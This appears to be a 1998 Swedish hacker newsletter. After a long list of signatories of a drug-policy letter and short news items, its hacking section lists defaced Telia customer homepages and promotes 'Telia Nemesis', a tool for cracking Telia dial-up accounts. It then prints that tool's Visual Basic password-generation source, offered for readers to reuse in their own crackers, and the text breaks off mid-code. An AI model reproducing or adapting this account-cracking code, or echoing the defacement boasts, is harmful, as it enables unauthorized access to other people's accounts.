Debate Agrario Antero Flores Araoz Member of Congress Lourdes Flores Nano Member of Congress Ernesto Gamarra Olivares Member of Congress Diego Garcia-Sayan Executive Director, Andean Commission of Jurists Alfonso Grados Bertorini Member of Congress, Peru Gustavo Gutierrez Theologian Jutta Krause German Technical Development Agency Manuel Lajo Member of Congress Guido Lombardi Anchor, Red Global TV Javier Perez de Cuellar Former Secretary General of the United Nations Federico Salazar Anchor, America TV Alejandro Santa Maria Member of Congress Annel Townsend Diez Canseco Member of Congress Jose Ugaz University Professor Allan Wagner Former Minister of Foreign Affairs POLAND Marek Balicki Psychiatrist, Former Deputy, Ministry of Health Mikolaj Kozakiewicz Former Speaker of Parliament (1989-1991); Vice-President of IPPFV Krzysztof Krajewski Professor, School of Criminology, University of Jagiellonski Marek Nowicki President, Helsinki Foundation for Human Rights; Member, Helsinki Commitee for Human Rights Danuta Przywara Secretary to the Board, Helsinki Foundation for Human Rights Andrzej Rzeplinski Professor of Criminology, University of Warsaw; Deputy President, Helsinki Foundation for Human Rights Janusz Sieroslawski Sociologist, Pompidou Group PORTUGAL Daniel Sampaio, MD, Ph.D. Professor of Psychiatry, University of Lisbon SOUTH AFRICA Malcolm Damon Public Policy Liason Officer, South African Council of Churches Neville Gabriel, C.S.S.R. SACBC Parliamentary Office Helen Suzman Former Opposition Member of Parliament, Johannesburg SPAIN Jose Antonio Alonso Suarez Judge. Juzgado de lo Penal n° 14 de Madrid Gregorio Alvarez Alvarez Judge. Juzgado de 1ª instancia e instrucción n° 2 de Salamanca Francisco Javier Alvarez Garcia Law Professor, Universidad de Cantabria Perfecto Andrés Ibañez Judge; Presidente de la Secc. 15. Audiencia provincial de Madrid Heriberto Asencio Castillan Judge. Audiencia provincial de Sevilla Adela Asua Batarrita Law Professor, Universidad de San Sebastiÿn Ignacio Berdugo Goméz De La Torre Dean and Law Professor, Universidad de Salamanca Emilio Berlanga Ribelles Judge. Tribunal Superior de Justicia de Cataluña Ricardo Bodas Martin Judge. Juzgado de lo Social n° 30 de Madrid Javier Boix Reig Law Professor - Universidad de Valencia Antonio Caballero Writer and journalist Francisco Candil Jimenez Law Professor, Universidad de Sevilla Rocio Cantarero Bandres Law Professor, Universidad de la Rioja Juan Carlos Carbonell Mateu Dean and Law Professor, Universidad de Valencia Manuela Carmena Castrillo Judge. Vocal del Consejo General del Poder judicial Miguel Carmona Ruano Judge, Presidente de la Audiencia provincial de Sevilla Jose Cid Moline Law Professor, Universidad Autónoma de Barcelona Candido Conde Pumpido Judge. Sala 2ª del Tribunal Supremo Antonio Contardo Industrialist Antonio Cuerda Riezu Law Professor, Universidad de LeónLetrado del Tribunal Constitucional Jose Luis De La Cuesta Arzamendi Vice Dean and Law Professor Universidad del País Vasco Juan Tomas De Salas Lawyer and Journalist- Founder of the Grupo16, Publisher and Editor of HisToria16, Editor of El Gato Encerrrado Jose Luis Díez Ripollés Law Professor, Universidad de MÿlagaCoordinador del Grupo de Estudios de Política Criminal Aurora Elosegui Sotos Judge.Juzgado de 1ª Instancia n° 6 de San Sebastiÿn Antonio Escohotado Writer Professor of the Universidad a Distancia, Author of the best seller "Historia de las Drogas" Jesus Fernandez Entralgo Judge. Secc. 17. Audiencia provincial de Madrid Maria Dolores Fernandez Rodriguez Law Professor, Universidad de Murcia Juan Carlos Ferre Olivé Law Professor, Universidad de Huelva Rafael Fluiters Casado Judge. Juzgado de 1ª instancia e instrucción n° 1 de Alcalÿ de Henares. Madrid Virginia Garcia Alarcon Judge. Juzgado de lo Social n° 22 de Madrid Mercedes García Arán Law Professor, Universidad Autónoma de Barcelona.Coordinadora del Grupo de Estudios de Política Criminal Antonio Gil Merino Judge, Presidente de la Secc. 7. Audiencia provincial de Sevilla Luis Gonzalez Guitián Law Professor, Universidad de Santiago de Compostela Luis Gracia Martin Law Professor, Universidad de Zaragoza Gumersindo Guinarte Cabada Law Professor, Universidad de Santiago de Compostela Hernan Hormazabal Malaree Law Professor, Universidad de Gerona Maria F Ibañez Solaz Judge. Juzgado de Instrucción n° 16 de Valencia Carmen Lamarca Perez Law Professor, Universidad Carlos III Gerardo Landrove Diaz Law Professor, Universidad de Murcia Elena Larrauri Pijoan Law Professor, Universidad Autónoma de Barcelona Patricia Laurenzo Copello Law Professor, Universidad de Mÿlaga Jose Manuel Lorenzo Salgado Law Professor, Universidad de Santiago de Compostela Borja Mapelli Caffarena Law Professor, Universidad de Sevilla Maria Luisa Maqueda Abreu Law Professor, Universidad de Almería Antonio Martin Pallin Judge. Sala 2ª del Tribunal Supremo Javier Martinez Lazaro Judge. Juzgado de lo Penal n° 4 de Madrid Fermin Morales Prats Law Professor, Universidad Autónoma de Barcelona Manuel Moran Gonzalez Judge. Audiencia Provincial de Salamanca Julian Manuel Moreno Retamino Judge. Tribunal Superior de Justicia, Sala Cont.-Adm. de Sevilla Claudio Movilla Alvarez Judge. Sala de lo Contencioso del Tribunal Supremo Francisco Muñoz Conde Law Professor, Universidad de Sevilla Enrique Orts Berenguer Law Professor, Universidad de Valencia Felix Pantoja Judge, Fiscal de Menores de Madrid Jose Miguel De Paul Velasco Judge. Audiencia Provincial de Sevilla Jose Joaquin Perez-Beneyto Abad Judge.Juzgado de lo Social n° 4 de Sevilla Mario Pestana Perez Judge. Juzgado de 1ª Ins. e Instrucción n° 1 de Leganés. Madrid.Coordinador del Grupo de Estudios de Política Criminal Miguel Polaino Navarrete Law Professor, Universidad de Sevilla Luis Rodriguez Ramos Catedrático de Derecho Penal de la Universidad Complutense de Madrid Horacio Roldÿn Barbero Law Professor, Universidad de Córdoba Juan Jose Romeo Laguna Judge. Audiencia provincial, Sección VIII de Sevilla Bernardo Del Rosal Blasco Law Professor, Universidad de Alicante Ramon Saez Valcarcel Judge. Vocal del Consejo General del Poder judicial Fernando Savater Writer / Philosopher Jose R. Serrano-Piedecasas Law Professor, Universidad de Salamanca Ascension Sole Puig Judge.Juzgado de lo Social n° 28 de Barcelona Josep Maria Tamarit Sumalla Law Professor, Universidad de Lérida Juan Terradillos Basoco Law Professor, Universidad de Cÿdiz Jose Manuel Valle Muñiz Law Professor, Universidad de Lérida Ramiro Ventura Faci Judge.Juzgado de Instrucción n° 18 de Madrid Luis Yañez-Barnuevo Member of Parliament Jose Miguel Zugaldia Espinar Dean, and Law Professor, Universidad de Granada SWEDEN Anders Bergmark Professor of social work, Stockholm University Peter Curman Former Chairman, Swedish Writer´s Union Ted Goldberg Associate Professor of social work, Stockholm University Olof Lagercrantz Former Editor-In-Chief, Dagens Nyheter Leif Lenke Associate Professor of criminology, Stockholm University Claes Örtendahl Former Director General, Board of Health and Welfare, Sweden Ingegmar Rexed Judge,Svea Court of Appeal, Stockholm Jerzy Sarnecki Professor of criminology, Stockholm University Sune Sunesson Professor of social work, Lund University Henrik Tham Professor of criminology, Stockholm University Per Ole Träskman Professor of penal law, Lund University, Sweden Hanns von Hofer Professor of criminology, Stockholm University SWITZERLAND Peter Albrecht Judge, Court of Bâle-Ville; Professor, University of Bâle Pascal Bernheim Second Manager, Radio Suisse Romande - La Première Dr. Barbara Broers Division of Substance Abuse, Department of Psychiatry, University Hospital of Geneva Christian Brunier Member of Parliament, Geneva; President, Geneva Socialist Party Pierre Philippe Cadert Journalist, Radio Suisse Romande Maria Luisa Cesoni Attorney, Research Fellow, Faculty of Law, University of Geneva Jacqueline Cogne Member of Parliament, Geneva Herve Dessimoz Congressman, Geneva Parliament Dr Dominique Hausser, MD, MSc Member of Parliament, Geneva; Co-president, Drug Policy Commission, Socialist Party Bohdan D. Hawrylyshyn Chairman, International Renaissance Foundation Michel Heiniger Film Director; Reporter, Swiss TV - Geneva Dr. Annie Mino MD Head, Division of Substance, Department of Psychiatry, University Hospital, Geneva Christian Nils Robert Professor, School of Law, Geneva; CPT Expert (Council of Europe) Albert Rodrik Member of Parliament, Geneva Francoise Schenk-Gottret Member of Parliament, Geneva UNITED STATES Morton Abramowitz International Crisis Group Bruce Ackerman Sterling Professor of Law, Yale University Tammy Baldwin Wisconsin State Representative, Candidate for Congress Randy E. Barnett Austin B.Fletcher Professor, Boston University School of Law Jeremiah A Barondess MD President, New York Academy of Medicine Jim Baumohl Bryn Mawr College David H. Bayley Dean, School of Criminal Justice State University of New York at Albany Peter Beilenson Baltimore City Health Commissioner Ivan T. Berend Professor, University of California, Los Angeles Robert L. Bernstein Founding Chair, Human Rights Watch Jagdish Bhagwati Professor of Economics, Columbia University Nicolaus Bloembergen Nobel Laureate (Physics 1981) Leon Botstein President, Bard College John Bound Professor of Economics, University of Michigan Willie Brown Mayor of San Francisco Richard Burt Senior Advisor, Center for Strategic and International Studies, Washington DC Calvin Butts III Pastor, Abyssinian Baptist Church, New York, NY Geoffrey Canada Rheedlen Center for Children & Families, Inc. William J Chambliss Professor, George Washington University Allan Clear Executive Director, Harm Reduction Coalition Harvey Cox Professor of Divinity, Harvard University Alan Cranston Former U.S. Senator Walter Cronkite Author, Broadcast Journalist John Curtin Federal Judge, Buffalo, NY Lloyd N. Cutler Lawyer, Wilmer, Cutler & Pickering; Former Counsel to the President, 1979-1981, 1994 Richard Dennis President, Dennis Trading Group Adrian W. DeWind Partner, Paul, Weiss, Rifkind, Wharton and Garrison Jameson Doig Professor of Politics and Public Affairs, Princeton University Vincent Dole, MD Professor Emeritus, Rockefeller University Elizabeth K. Dollard Professor of Law, Medicine & Psychiatry at NYU Law School Ann Druyan Federation of American Scientists Steven Duke Professor, Yale Law School Troy Duster Professor of Sociology, University of California, Berkeley Jonathan Eaton Chairman, Department of Economics, Boston University Thomas Eissenberg, Ph.D. Assistant Professor, Virginia Commonwealth University Joycelyn Elders Former U.S. Surgeon General Ahmet Ertegun Executive Chairman, Atlantic Records Jonathan F. Fanton President, New School University John Ferejohn Professor of Political Science, Stanford, Senior Fellow Hoover Institution, Stanford University Herman Feshbach Institute Professor Emeritus, MIT Robert Field Chairman, Common Sense for Drug Policy Hamilton Fish President, Public Concern Foundation Val L. Fitch Professor Emeritus of Physics, Princeton University Rev. Floyd Flake Cathedral of the Allen AME Church, Pastor Kathleen M. Foley Project on Death in America Milton Friedman Senior Research Fellow, Hoover Insitution, Stanford University Douglas Gale Professor of Economics, New York University H. Jack Geiger, MD Professor of Community Medicine, City University of New York Medical School Adrienne Germain President, International Women´s Health Coalition Alfred G. Gilman, MD, PhD Regental Professor and Chairman, Department of Pharmacology, University of Texas Ira Glasser Executive Director, The American Civil Liberties Union Ellen Goldberg President, Santa Fe Institute Marvin L. Goldberger Dean, Division of Natural Sciences, University of California, San Diego Stephen Jay Gould Harvard University Mike Gray Author, "Drug Crazy" Paul Greengard Vincent Astor Professor of Neuroscience, Chief of the Laboratory of Molecular and Cellular Neuroscience, Rockefeller University Lester Grinspoon Harvard Medical School Lani Guinier Professor of Law, University of Pennsylvania Terrence Hallinan District Attorney of San Francisco Morton H. Halperin Former Department of Defense and National Security Council Official Susan Hammer Mayor of San Jose Vernon Henderson Professor of Economics, Brown University Arnold Hiatt Stride Rite Foundation H.J. Hoffer, PhD Dean Emeritus, Katz Graduate School of Business, University of Pittsburgh Sher Horosko Executive Director, Drug Policy Foundation Douglas Husak Professor of Philosophy, Rutgers University Alex Inkeles Sociologist, Senior Fellow Emeritus Hoover Institution, Stanford University Sut Jhally Professor of Communication, University of Massachusetts - Amherst Carole Joffe Professor of Sociology at University of California Howard Josepher, CSW Executive Director, Exponents Inc. John Kane Federal Judge, Denver, CO Nicholas Katzenbach Former Attorney General Donald Kennedy President Emeritus Stanford University; Professor Bological Services, Stanford Rufus King, Sr. Daniel Klein Department of Economics, Santa Clara University Whitman Knapp Senior District Judge, Southern District of New York Jeanne E. Kohl Senator, Washington State Melvyn Krauss Economist, Senior Fellow Hoover Institution, Stanford University Mike Lawlor Chair Judiciary Committee, Connecticut House of Representatives Joshua Lederberg Professor, Rockefeller University Phillip R. Lee Professor Emeritus, School of Medicine, University of California, San Francisco David Lenson Professor of Comparative Literature, University of Massachusetts, Amherst Titus Levi Assistant Professor, University of Southern California Robin J. Lewis Associate Dean, School of International Affairs, Columbia University Peter Lewis Chairman, CEO, The Progressive Corporation Walter Loewenstern, Jr., PhD Co-Founder ROLM Corporation, Overseer Hoover Institution, Stanford University, President Vail Valley Institute Robert E. Lucas, Jr. Department of Economics, University of Chicago Peter Lurie University of Michigan Paul Martin L. Nobel Laureate (Physics) Gary T. Marx Professor Emeritus, M.I.T.; Professor of Sociology, University of Colorado Joseph McNamara Former Police Chief of Kansas City and San Jose, Research Fellow Hoover Institution Donal E. J. McNamara Former President American Society of Criminology Miguel Mendez Professor of Law, Stanford University Matthew Meselson Harvard University Ruth Messenger Former Manhattan Borough President Robert B. Millman Soul P. Steinberg Distinguished Professor of Psychiatry and Public Health, Cornell University Medical College Jeff Miron Professor of Economics, Boston University Toby Moffett Former U.S. Congressman; Vice President, Monsanto Company, Washington, DC Howard Moody Reverend Emeritus, Judson Memorial Church, New York, NY Thomas Moore Economist, Senior Fellow, Hoover Institution, Stanford University Paul Moore, Jr. Bishop (Retired), Episcopal Church of New York Dr. John P. Morgan Professor of Pharmacology, City University of New York Medical School Andrew P. Morriss Associate Professor of Law & Associate Professor of Economics, Case Western Reserve University, Cleveland, Ohio Patrick Murphy Former Police Commissioner of New York City Charles Murray American Enterprise Institute Ethan Nadelmann, PhD Director, The Lindesmith Center Robert Newman Continuum Health Partners Roger Noll Professor of Economics, Director of Public Policy Program, Stanford University Richard L. Ottinger Former Congressman Denise Paone, PhD Assistant Director of Research, Asisstant Professor, Beth Israel Medical Center Claiborne Pell Former U.S. Senator Joan Petersilia Professor of Criminology, University of California, Irvine Gerard Piel Former Editor/Publisher, Scientific American Senator Anne Rand Assistant Majority Leader, Maine Senate David Rasmussen Professor of Economics, Florida State University William Ratliff Political Scientist, Senior Research Fellow Hoover Institution, Stanford University Craig Reinarman Professor of Sociology, Univeristy of California, Santa Cruz Timothy N. Robertson Legislator, New Hampshire Dean E. Robinson Assistant Professor, University of Massachusetts - Amherst G. Alan Robison Distinguished Professor of Pharmacology, University of Texas, Houston Laurance Rockefeller Ruth Rosen Professor of History at the U. of California, Davis Marsha Rosenbaum Director The Lindesmith Center, San Francisco office Allan Rosenfield Dean, Columbia School of Public Health Vernon W. Ruttan Regents Professor, University of Minnesota Oscar Schachter Professor Emeritus of International Law and Diplomacy, Columbia University Kurt Schmoke Mayor of Baltimore Sidney H. Schnoll, M.D., Ph.D. Division of Substance Abuse Medicine, Medical College of Virginia Carl E. Schorske Professor of History, Princeton University Herman Schwartz Professor of Law, American University George Shultz Former Secretary of State, Dinstinguished Fellow, Hoover Institution Henry Siegman Senior Fellow, Council on Foreign Relations, New York Richard E. Smalley Nobel Laureate (Chemistry, 1996) George Soros Chairman, Soros Fund Management LCC; Chairman, Open Society Institute John Sperling Chairman and CEO, Apollo Group, Inc. Eric Sterling President, Criminal Justice Policy Foundation, Washington, D.C. Robert S. Strauss Akin, Gump, Strauss, Hauer & Feld Eve Sullivan Founder, Parents´ Forum Leon H. Sullivan Chairman, OIC of America Robert Sweet Federal Judge, New York, NY Hon. James W. Symington Attorney at Law David J. Theroux Founder/President, The Independent Institute Brooks Thomas Former Chairman and CEO Harper and Row, Publishers, Inc. John S. Toll Chancellor Emeritus, University of Maryland System; President, Washington College; Former President, Washington Academy of Sciences; Former President, Universities Research Association Arnold S. Trebach, J.D. , Ph.D. Professor Emeritus, American University; Founder, The Drug Policy Foundation Donald Trunkey MD, Chairman and Professor, Department of Surgery, Oregon Health Sciences University Richard Ullman Professor , Woodrow Wilson School, Princeton Universtiy J. Thomas Ungerleider, MD Professor Emeritus of Psychiatry, University of California, Los Angeles, Medical Center; Presidential Appointee (Nixon), National Commission on Marijuana and Drug Abuse Dr. Mark Vierra Assistant Professor of Surgery, Stanford University James Vorenberg Professor, Harvard Law School Faye Wattleton Former Executive Director, Planned Parenthood Andrew Weil Clinical Professor of Internal Medicine, University of Arizona College of Medicine; Author of "Spontaneous Healing" and "Natural Health, Natural Healing" Andrew Weiss Professor of Economics, Boston University Jann S. Wenner Chairman, Wenner Media, Inc. Cornel West Professor, Harvard University Sidney M. Wolfe, MD Public Citizen´s Health Research Group Gavin Wright Professor of Economics, Stanford University Kevin B. Zeese President, Common Sense for Drug Policy George Zimmer Chairman/CEO, Men´s Wearhouse Lynn Zimmer Associate Professor of Sociology, Queens College, City University of New York Franklin Zimring Professor of Law, UC Berkeley Jeffrey Zwiebel Associate Professor of Finance, Graduate School of Business, Stanford University UNITED KINGDOM Lord Rae House of Lords Austin N.E. Amissah Judge, London Rabbi Tony Bayfield Director, Sternberg Centre for Judaism Colin Blakemore Professor; Fellow of the Royal Society; President, British Association for the Advancement of Science Colin Brewer Medical Director, the Stapleford Centre Rabbi Sidney Brichto Senior Vice President of the Union of Liberal and Progressive Synagogues Peter P. Burnett Bodleian Library Alison Downie Chair of Release, Solicitor Edward Ellison Retired Detective Chief Superintendent Metropolitan Police, Operational Head of Scotland Yard Drug Squad Stephen Fineman Professor, University of Bath Paul Flynn Member of Parliament, House of Commons Mike Goodman Director Release Dr. Brian Iddon Member of Parliament, London Mike Jay Chairman, Drug Policy Review Group Nicholas Kurti Fellow of the Royal Society Danny Kushlick Director, Transform Reverend Dr. Kenneth Leech Founder of Soho Drugs Group, Founder of Centrepoint Robin Marris Professor Emeritus, London University Judi Marshall Professor, Bath University Austin Mitchell Member of Parliament, UK Edith Morgan Mental Health Consultant, Order of the British Empire Dr. Richard Newman Professor of History, University of Wales Swansea John Purcell Professor, School of Human Resource Management, University of Bath Lord Rae, MD House of Lords Anita Roddick, OBE Founder, The Body Shop Martin Short Author Nigel South Professor of Sociology, University of Essex Ian Sparks Chief Executive, The Children´s Society Eleanor Stephens Senior Lecturer, Media Journalism, University of Sheffield Richard Stevenson Professor of Health Economy, Liverpool University Anthony Tibber Judge, London Carole Tongue Member of European Parliament Right Reverend Rowan Williams Bishop of Monmouth URUGUAY Mario Benedetti Writer VENEZUELA Simon Alberto Consalvi Former Minister of Foreign Affairs Diego Arria Ambassador; Former Representative of Venezuela to the United Nations and Security Council __________________________________________________________________________ 5, DROGTESTER ALLT VANLIGARE PÅ ARBETSPLATSER ========================== Antalet drogtester på arbetsplatser ökar stadigt. LabMedicin vid Huddinge sjukhus, som utför cirka 80 procent av landets tester, gjorde förra året 40 000 analyser, en fördubbling jämfört med året före. Så sent som 1992 utfördes bara 100 analyser vid Huddinge Sjukhus. I dag drogtestar vart tredje större företag sin personal. Det sker främst vid nyanställning, men också vid misstanke. [Källa: Metro] __________________________________________________________________________ > > > H A C K I N G / C O M P U T E R U N D E R G R O U N D / I T < < < __________________________________________________________________________ 6. THE EVIL FELIA FUCKERS INC PRESENTERAR: VECKANS HACKADE TELIA SIDOR ========================== ´Tha Evil Felia Fuckers iNC´ proudly present: ´Veckans hackade Telia sidor´ http://w1.510.telia.com/~u51000380/ http://w1.520.telia.com/~u52002969/ http://w1.520.telia.com/~u52003006/ http://w1.361.telia.com/~u36103056/ http://w1.361.telia.com/~u36102809/ http://w1.361.telia.com/~u36103325/ http://w1.851.telia.com/~u85102752/ http://w1.851.telia.com/~u85100036/ http://w1.866.telia.com/~u86602009/ http://w1.191.telia.com/~u19102038/ tEFF Crew __________________________________________________________________________ 7. PORRBILD PÅ KUNGEN SOM NAKEN KVINNA UPPRÖR KTH ========================== Två manliga studenter vid Kungliga Tekniska Högskolan har utestängts från lokalerna och all undervisning i tre månader. Orsaken: en sångtext om ett samlag mellan kungen och drottningen och en bild på kungen som naken kvinna. Texten och bilden hade studenterna lagt ut på Internet. KTH:s disciplinnämnd ansåg att eleverna spridit pornografiskt material som allvarligt kränker kungen och drottningen. Nämden ansåg att också KTH:s anseende äventyrats genom det som inträffat." [Källa: GP, 5/6-98] __________________________________________________________________________ 8. INTERNET DOM I TYSKLAND FÅR KRITIK ========================== Torsdagen den 28 maj blev förra Compuserve-chefen i Tyskland, Felix Somm dömd till två års villkorligt fängelsestraff. Grund: Medhjälp till spridning av barn- och djur-pornografi. FDP-Generalsekreterare (Freie Deutsche Partei, tyska liberala partiet) Guido Westerwelle har fodrat en korrektur på domen genom den nästa juristiska instansen. Westerwelle: "Här blev inte gärningsmännen straffade!". Somm har inte gjort något annat än att förmedla datorägare tillgången till Internet. Om domen kvarstår kommer Tyskland att internationellt isolera sig och ISPs kommer att gå Tyskland ur vägen. Även ISP´s som T-Online, Compuserve, AOL och germany.net kritiserade domen. [Källa: "die Blöd-Zeitung" 2 juni ´98 | Översättning: Aron Håkanson] __________________________________________________________________________ 9. HACKERS STAL DATA OM BOMBER ========================== En grupp hackers hävdar att de brutit sig in i indiska datorsystem vid Bhabha Atomic Research Centre i Bombay. Där ska de bland annat ha kopierat e-post mellan indiska forskare veckorna före och efter bombsprängningarna. De hävdar att de försöker knäcka forskningsdatorer i Pakistan nu. [Källa: Wired] __________________________________________________________________________ 10. TELIA NEMESIS V.1.4 SLÄPPS 20 JUNI ========================== Telia Nemesis (Hämnd) är ett Windows 95-program som enkelt och snabbt knäcker Telia 020 konton (1997, U-konton) via FTP. Programmet ligger nu på version 1.3 och har hittils knäckt hundratals konton. Programmet är gratis och finns att ladda ner på adressen http://netking.ml.org/nemesis. Programmet är utvecklat av en 16 årig pojkspoling som kommenterar om Telias bristande säkerhet påföljande sätt: "Det är pinsamt att en 16-åring ska kunna göra ett program under en veckas tid som snabbt och enkelt knäcker koder till Telia konton. I runt en månad har programmet varit tillgängligt, och när Telia till slut bestämde sig för att göra något åt saken så var deras FTP nere i hela två veckor för ´service´. Under denna tiden kunde ingen Telia 020 abonnent t.ex ändra sina hemsidor etc. Jag undrar vad dom kör för servrar... NT på Intel burkar? Ha ha ha!" Just innan version 1.4 skulle släppas så fixade Telia detta pinsamma problem. Telia Nemesis 1.4 kommer dock att släppas 20:e Juni (istället för 10:e) och kommer då att gå till väga på ett annat sätt när det knäcker konton. Kolla på: http://netking.ml.org/nemesis för uppdateringar etc. OBS! De tidigare versionerna funkar alltså inte längre eftersom dom alla gick via FTP. Anonym @ #020.se __________________________________________________________________________ 11. KÄLLKODEN (VISUAL BASIC) FÖR TELIA NEMESIS ========================== Källkoden (Visual Basic) för password-generatorn bifogas här också. ´Telia Nemesis ´------------------------------------- ´Sourcecoden för att generera lösenord i Visual Basic från Telia Nemesis! ´Denna kod borde funka i version 3.0 av VB och uppåt (bara testad i 4.0 och 5.0) ´------------------------------------- ´Använd koden i era program för att generera de cirka 4500 lösenord som existerar i Telias ´gamla konton. ´Var god läs i flashback #97 om hur Telias lösenord fungerar så blir denna kod ´mycket enklare att förstå. ´Det enda ni behöver göra är att paste:a in hela koden i ert "codewindow" ´Det ni behöver till "projektet" (nu snackar vi VB ;) är: ´ ´1. En form, som ska heta Form1 ´2. En Timer som ska heta Timer1 ´ ´Ni kanske redan lagt märke till att det inte behövs några x-tra kontroller eller DLL-filer för exemplet. ´ ´Whatever, nu börjar vi! ´Här deklareras de nödvändiga variablerna: Dim a, b, c, d, e, f, g, h, ax, bx, cx, dx, ex, fx, gx, hx, pass ´När programmet laddas set den till att de första lösenorden börjar med ett "y", självklart kan ni ändra dessa. Men då måste ni också ändra vilket tecken den ska sluta på i koden också. Private Sub Form_Load() Timer1.Interval = 1 ax = "y" X = "y" End Sub ´Timer som genererar lösenorden ´Jag ska försöka förklara hur generatorn fungerar ´OBS! Läs nr #97 av Flashback för att få en uppfattning om hur lösenorden är ´uppbyggda annars kommer ni nog inte förstå ett dugg av denna röra :) ´ ´Det första tecknet av lösenordet har alltså 28 olika möjligheter och ´efter varje tecken finns det alltså 2 efterföljare. En varibel avgör vilken... ´ ´Exempel: ´Vi säger att det första tecknet är ett "y" då måste det andra alltså vara "6" ´eller "X" (kolla tabellerna codes1: och codes2: nedan). Variabeln ax står för ´första tecknet, bx för andra osv... Är variabeln bx = 0 så kommer den att ta ´tecknet "6" och är bx = 1 så kommer den att ta tecknet "X". ´OBS! Variabeln ax skiljer sig ifrån dom andra eftersom det finns 28 olika ´möjligheter i första tecknet av lösenordet och bara 2 i de andra. bx, cx, dx, ex, ´fx, gx och hx kan alltså bara ha värdet 1 och 0. ´Första gången Timer´n körs ska variablerna se ut såhär: ´ax = "y" ´bx = 0 ´cx = 0 ´dx = 0 ´ex = 0 ´fx = 0 ´gx = 0 ´hx = 0 ´I nästa försök kommer variabeln hx (sista tecknet) att ha värdet 1 så att sista ´tecknet i lösenordet ändras. Efter varannat försök kommer även variabeln gx att ´ändras samtdigt som variabeln hx ändras till 0 igen, var 4:e försök kommer fx ändras, ´var 8:e försök ex t.o.m ax som ändras var 128:e gång. På så sätt får man fram ´de alla olika kombinatinerna. Smart va? ´variablerna a, b, c, d, e, f, g och h är till för att applikationen ska veta när ´de övriga variablerna ska bytas, t ex: ´b = b + 1 ´if b = 64 then bx = 1 ´b = 0 ´Observera att den bygger om lösenordet under varje "timer function" och ändrar inte bara på det! ´ ´Hoppas denna lilla förklaring fick er en uppfattning om hur generatorn fungerar. ´Generatorn gjordes Februari-Mars 1997. Programmet lades dock ner i 2 månader ´pga av en bug som jag inte upptäckte förrän April då jag tänkte återuppliva ´det igen. Nemesis v1.0 släpptes i April. 2 dagar efter kom v1.1 ´När ni läser detta borde v1.4+ vara ute som ni kan ladda ner från ´http://netking.ml.org/nemesis/ Men varför göra det nu när det går lika lätt ´att göra ett eget prg? :) Private Sub Timer1_Timer() On Error GoTo 99 ´Här anges första tecknet i lösenordet, det finns 28 olika att välja med. ´Den börjar, om ni inte ändrat i koden, med ett "y" 10 a = a + 1 If a = 128 Then GoTo 11 End If GoTo 15 11 a = 0 ´Om variabeln a nått värdet 128 är det dags att byta första tecken i lösenordet: If ax = "y" Then ax = "Q": GoTo 13 If ax = "Q" Then ax = "q": GoTo 13 If ax = "q" Then ax = "x": GoTo 13 If ax = "x" Then ax = "7": GoTo 13 If ax = "7" Then ax = "N": GoTo 13 If ax = "N" Then ax = "M": GoTo 13 If ax = "M" Then ax = "B": GoTo 13 If ax = "B" Then ax = "E": GoTo 13 If ax = "E" Then ax = "9": GoTo 13 If ax = "9" Then ax = "P": GoTo 13 If ax = "P" Then ax = "3": GoTo 13 If ax = "3" Then ax = "r": GoTo 13 If ax = "r" Then ax = "a": GoTo 13 If ax = "a" Then ax = "6": GoTo 13 If ax = "6" Then ax = "f": GoTo 13 If ax = "f" Then ax = "A": GoTo 13 If ax = "A" Then ax = "D": GoTo 13 If ax = "D" Then ax = "H": GoTo 13 If ax = "H" Then ax = "p": GoTo 13 If ax = "p" Then ax = "4": GoTo 13 If ax = "4" Then ax = "G": GoTo 13 If ax = "G" Then ax = "Y": GoTo 13 If ax = "Y" Then ax = "c": GoTo 13 If ax = "c" Then ax = "b": GoTo 13 If ax = "b" Then ax = "8": GoTo 13 If ax = "8" Then ax = "d": GoTo 13 ´troligtvis ej existerade tecken If ax = "d" Then ax = "2": GoTo 13 If ax = "2" Then ax = "5": GoTo 13 If ax = "5" Then ax = "C": GoTo 13 If ax = "C" Then ax = "F": GoTo 13 If ax = "F" Then ax = "K": GoTo 13 If ax = "K" Then ax = "R": GoTo 13 If ax = "R" Then ax = "X": GoTo 13 If ax = "X" Then ax = "e": GoTo 13 If ax = "e" Then ax = "g": GoTo 13 If ax = "g" Then ax = "h": GoTo 13 If ax = "h" Then GoTo 12 12 ´När den gått igenom alla lösenord så genomförs denna procedur If ax = "h" Then MsgBox "Blah!", 64, "Alert :)" Timer1.Interval = 0 GoTo 100 End If 13 15 pass = "" pass = pass + ax ´Första tecknet i lösenordet läggs till. X = ax ´Här genereras andra tecknet i lösenordet 20 If bx = 0 Then ´Är variabeln bx = 0 så ska den ta ett tecken från sub-functionen codes1 (se längre ner) och sätta in det som andra tecken i lösenordet GoSub codes1 End If If bx = 1 Then ´Är variabeln bx = 1 så ska den ta ett tecken från sub-functionen codes2 (se längre ner) och sätta in det som andra tecken i lösenordet GoSub codes2 End If b = b + 1 If b = 64 Then ´Har variabeln b nått värdet 64 är det dags att byra värdet på bx If bx = 0 Then bx = 1 b = 0 Else bx = 0 b = 0 End If End If ´Här genereras tredje tecknet i lösenordet 30 If cx = 0 Then GoSub codes1 End If If cx = 1 Then GoSub codes2 End If c = c + 1 If c = 32 Then If cx = 0 Then cx = 1 c = 0 Else cx = 0 c = 0 End If End If ´Här genereras fjärde tecknet i lösenordet 40 If dx = 0 Then GoSub codes1 End If If dx = 1 Then GoSub codes2 End If d = d + 1 If d = 16 Then If dx = 0 Then dx = 1 d = 0 Else dx = 0 d = 0 End If End If ´Här genereras femte tecknet i lösenordet 50 If ex = 0 Then GoSub codes1 End If If ex = 1 Then GoSub codes2 End If e = e + 1 If e = 8 Then If ex = 0 Then ex = 1 e = 0 Else ex = 0 e = 0 End If End If ´Här genereras sjätte tecknet i lösenordet 60 If fx = 0 Then GoSub codes1 End If If fx = 1 Then GoSub codes2 End If f = f + 1 If f = 4 Then If fx = 0 Then fx = 1 f = 0 Else f = 0 fx = 0 End If End If ´Här genereras sjunde tecknet i lösenordet 70 If gx = 0 Then GoSub codes1 End If If gx = 1 Then GoSub codes2 End If g = g + 1 If g = 2 Then If gx = 0 Then g = 0 gx = 1 Else g = 0 gx = 0 End If End If ´Här genereras åttonde och sista tecknet i lösenordet 80 If hx = 0 Then hx = 1 GoSub codes1 Else GoSub codes2 hx = 0 h = 0 End If GoTo 90 codes1: If X = "2" Then Y = "6" If X = "3" Then Y = "7" If X = "4" Then Y = "7" If X = "5" Then Y = "8" If X = "6" Then Y = "8" If X = "7" Then Y = "9" If X = "8" Then Y = "9" If X = "9" Then Y = "A" If X = "A" Then Y = "A" If X = "B" Then Y = "B" If X = "C" Then Y = "B" If X = "D" Then Y = "C" If X = "E" Then Y = "C" If X = "F" Then Y = "D" If X = 